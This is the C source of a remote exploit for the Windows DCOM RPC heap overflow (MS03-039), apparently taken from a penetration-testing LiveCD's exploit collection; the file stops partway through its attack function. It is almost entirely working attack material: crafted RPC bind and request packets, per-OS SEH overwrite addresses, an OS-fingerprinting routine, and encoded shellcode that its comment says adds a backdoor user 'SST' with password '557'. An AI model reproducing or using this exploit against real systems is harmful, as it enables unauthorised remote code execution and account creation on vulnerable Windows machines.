home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / rpcdcom3.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  21KB  |  598 lines
  1. /*  Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3)  */
  2. /*                    Must be used with the associated shell                        */
  3. /*                                                                                                  */
  4. /*           This exploit works against unpatched systems (MS03-039)     */
  5. /*             And cause a Denial of Service on patched systems (rpc3)     */
  6.  
  7.  
  8. #include <stdio.h> 
  9. #include <winsock2.h> 
  10. #include <windows.h> 
  11. #include <process.h> 
  12. #include <string.h> 
  13. #include <winbase.h> 
  14.  
  15. FILE *fp1; 
  16. unsigned char bindstr[]={ 
  17. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
  18. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
  19. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 
  20. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
  21. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 
  22.  
  23. unsigned char request1[]={ 
  24. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
  25. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
  26. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
  27. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
  28. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
  29. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
  30. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
  31. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
  32. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
  33. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
  34. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
  35. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
  36. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
  37. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
  38. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  39. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
  40. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
  41. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
  42. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
  43. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
  44. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
  45. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
  46. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
  47. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
  48. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
  49. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
  50. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
  51. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  52. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  53. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  54. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  55. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
  56. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
  57. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
  58. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
  59. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
  60. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
  61. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
  62. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  63. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
  64. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
  65. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
  66. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
  67. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
  68. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
  69. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  70. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
  71. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
  72. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  73. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 
  74. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 
  75. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  76. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 
  77. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 
  78. ,0x00,0x00,0x00,0x00,0x00,0x00}; 
  79.  
  80. unsigned char request2[]={ 
  81. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 
  82. ,0x00,0x00,0x5C,0x00,0x5C,0x00}; 
  83.  
  84. unsigned char request3[]={ 
  85. 0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 
  86. 0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 
  87. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
  88. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
  89. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 
  90.  
  91.  
  92. unsigned char request4[]={ 
  93. 0x01,0x10 
  94. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 
  95. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 
  96. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
  97. }; 
  98. void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) 
  100. for(int i=offset;i<(offset+lenght);i++) 
  101. buf[i]=buf[i]^mask; 
  103. DWORD GETSTRCS(char *buf) 
  105. DWORD cs=0; 
  106. bool cld=false; 
  107. for(unsigned int i=0;i<strlen(buf);i++) 
  109. for(int z=0;z<13;z++) 
  111. if(cs&1) cld=true; 
  112. cs=cs>>1; 
  113. if(cld) cs=cs|0x80000000; 
  114. cld=false; 
  116. cs+=buf[i]; 
  118. return cs; 
  120.  
  121. struct { 
  122. DWORD seh; 
  123. DWORD jmp; 
  124. DWORD heap; 
  125. char target[200]; 
  126. } target_os[]= 
  129. 0x005Bfd2c, 
  130. 0x00081eeb, 
  131. 0x00180000, 
  132. "WinXP" 
  133. }, 
  135. 0x0095fd3c, 
  136. 0x00081eeb, 
  137. 0x00170000, 
  138. "Win2K" 
  140. },v; 
  141. unsigned char rawData1[]= 
  142. "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" 
  143. "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" 
  144.  
  145. "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" 
  146. "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" 
  147. "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" 
  148. "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2" 
  149.  
  150. //SHELLCODE From SAM ,THANKs ! 
  151. //Add user SST,password is 557, 
  152. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" 
  153. "\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
  154.  
  155. "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" 
  156. "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" 
  157. "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" 
  158. "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" 
  159. "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" 
  160. "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" 
  161. "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" 
  162. "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" 
  163. "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" 
  164. "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" 
  165. "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" 
  166. "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" 
  167. "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" 
  168. "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" 
  169. "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" 
  170. "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" 
  171. "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" 
  172. "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" 
  173. "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" 
  174. "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" 
  175. "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" 
  176.  
  177. "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" 
  178. "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" 
  179. "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" 
  180. "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" 
  181. "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" 
  182. "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" 
  183. "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" // 
  184. "\x90\x90\x90\x90\x90\x90\x90\x90" 
  185. "\x77\xe0\x43\x00\x00\x10\x5c\x00" 
  186. "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26 
  187. "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os 
  188.  
  189.  
  190. //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic 
  191. //"Utilization of released heap structure and exploit of universal Heap overflow in windows ". 
  192. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" 
  193. "\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
  194. "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" 
  195. "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" 
  196. "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" 
  197. "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" 
  198. "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" 
  199. "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" 
  200. "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" 
  201. "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" 
  202. "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" 
  203. "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" 
  204. "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" 
  205. "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" 
  206. "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" 
  207. "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" 
  208. "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" 
  209. "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" 
  210. "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" 
  211. "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" 
  212. "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" 
  213. "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" 
  214. "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" 
  215. "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" 
  216. "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" 
  217. "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" 
  218. "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" 
  219. "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" 
  220.  
  221. "\x04\x04\x00\x70\x00\x04\x40" 
  222. "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" 
  223.  
  224. "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; 
  225.  
  226.  
  227. int version(char ip[16], int sock) 
  229. //un poco de ettercap... 
  230.  
  231.  
  232. unsigned char peer0_0[] = { 
  233. 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 
  234. 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 
  235. 0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 
  236. 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 
  237. 0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 
  238. 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 
  239. 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
  240. 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
  241. 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
  242. 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 
  243. 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 
  244. 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 
  245. 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
  246. 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
  247. 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 
  248. 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 
  249. 0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 
  250. 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
  251. 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
  252. 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
  253. 0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 
  254. 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 
  255. 0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 
  256. 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
  257. 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
  258. 0x02, 0x00, 0x00, 0x00 }; 
  259.  
  260.  
  261. unsigned char peer0_1[] = { 
  262. 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 
  263. 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 
  264. 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
  265. 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 
  266. 0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 
  267. 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 
  268. 0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 
  269. 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 
  270. 0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 
  271. 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
  272. 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
  273. 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 
  274. 0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 
  275. 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 
  276. 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 
  277. 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
  278. 0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 
  279. 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 
  280. 0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  281. 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 
  282. 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
  283. 0x07, 0x00 }; 
  284.  
  285. /* 
  286.  
  287. unsigned char win2kvuln[] = { 
  288. 0x04, 0x00, 0x00, 0x00, 
  289. 0x00, 0x00, 0x00, 0x00, 
  290. 0x04, 0x5d, 0x88, 0x8a, 
  291. 0xeb, 0x1c, 0xc9, 0x11, 
  292. 0x9f, 0xe8, 0x08, 0x00, 
  293. 0x2b, 0x10, 0x48, 0x60, 
  294. 0x02, 0x00, 0x00, 0x00, 
  295. 0x00, 0x00, 0x00, 0x00, 
  296. 0x04, 0x5d, 0x88, 0x8a, 
  297. 0xeb, 0x1c, 0xc9, 0x11, 
  298. 0x9f, 0xe8, 0x08, 0x00, 
  299. 0x2b, 0x10, 0x48, 0x60, 
  300. 0x02, 0x00, 0x00, 0x00}; 
  301. */ 
  302. fd_set fds2; 
  303. unsigned char buf[1024]; 
  304.  
  305. int l; 
  306. struct timeval tv2; 
  307. FD_ZERO(&fds2); 
  308. FD_SET(sock, &fds2); 
  309. tv2.tv_sec = 6; 
  310. tv2.tv_usec = 0; 
  311.  
  312. memset(buf,'\0',sizeof(buf)); 
  313. send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
  314. if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
  316. l=recv (sock, (char *)buf, sizeof (buf),0); 
  317. // for(i=0;i<52;i++) 
  318. // { 
  319. // if (i==28) i=i+4; 
  320. // if (buf[i+32]!=win2kvuln) 
  321. // { 
  322. send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
  323. if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
  325. memset(buf,'\0',sizeof(buf)); 
  326. l=recv (sock, (char *)buf, sizeof (buf),0); 
  327. if (l==32) 
  329. closesocket(sock); 
  330. return(1);//winxp 
  332. else 
  334. #ifdef WIN32 
  335. closesocket(sock); 
  336. #else 
  337. close(sock); 
  338. #endif 
  339. return(0);//win2kby default. Nt4 not added.. 
  342. else return(-1); 
  343. // } 
  344.  
  345.  
  346. //} 
  347. // closesocket(sock); 
  348. // return(0);//win2k 
  350. closesocket(sock); 
  351. return(-1); //Unknown 
  353. /********************************************************************************/ 
  354. int attack(char *ip1,bool atack) 
  356. unsigned char rawData[1036]; 
  357. memcpy(rawData,rawData1,1036); 
  358. unsigned char shellcode[50000]; 
  359. char ip[200]; 
  360. strcpy(ip,ip1); 
  361. WSADATA WSAData; 
  362. SOCKET sock; 
  363. int len,len1; 
  364. SOCKADDR_IN addr_in; 
  365. short port=135; 
  366. unsigned char buf1[50000]; 
  367. unsigned char buf2[50000]; 
  368.  
  369. printf("%s\n",ip); 
  370. //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); 
  371. //printf("Code by FlashSky,Flashsky xfocus org\n"); 
  372. //printf("Welcome to our Site: http://www.xfocus.org\n"); 
  373. //printf("Welcome to our Site: http://www.venustech.com.cn\n"); 
  374. /* if(argc!=3) 
  376. printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
  377. for(int i=0;i<sizeof(target_os)/sizeof(v);i++) 
  378. printf("%d - %s\n",i,target_os.target); 
  379. printf("\n%x\n",GETSTRCS(argv[1])); 
  380. return; 
  382. */ 
  383. /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 
  385. printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 
  386. return; 
  388. */ 
  389. addr_in.sin_family=AF_INET; 
  390. addr_in.sin_port=htons(port); 
  391. addr_in.sin_addr.S_un.S_addr=inet_addr(ip); 
  392.  
  393. if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 
  395. printf("Socket failed.Error:%d\n",WSAGetLastError()); 
  396. return 0; 
  398. len1=sizeof(request1); 
  399.  
  400. len=sizeof(rawData); 
  401.  
  402. if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 
  404. printf("%s - connect failed\n",ip); 
  405. return 0; 
  407.  
  408. int vers=!version(ip,sock); 
  409.  
  410. // printf("%d\n",vers); 
  411. // return; 
  412. // int vers=1; 
  413.  
  414. FILE *fp; 
  415.  
  416. //∩┐╜∩┐╜∩┐╜ φѼ ∩┐╜ φ¬Ñ∩┐╜ 
  417. // fp=fopen("shellcode","rb"); 
  418. // fread(rawData,1,1036,fp); 
  419. // fclose(fp); 
  420. //ΓÑ»∩┐╜∩┐╜∩┐╜ ∩┐╜πª¡∩┐╜ ∩┐╜∩┐╜∩┐╜∩┐╜∩┐╜ ∩┐╜∩┐╜ φ¡Ñφ»«∩┐╜αÑñ∩┐╜ΓóÑφ¡¡∩┐╜ ∩┐╜ß»«φ½¡∩Ѽ∩┐╜∩┐╜ Φѽφ½¬φ«ñ! 
  421.  
  422. fp=fopen("bshell2","rb"); 
  423. int sz=fread(shellcode,1,1024,fp); 
  424. fclose(fp); 
  425. // printf("%d\n",sz); 
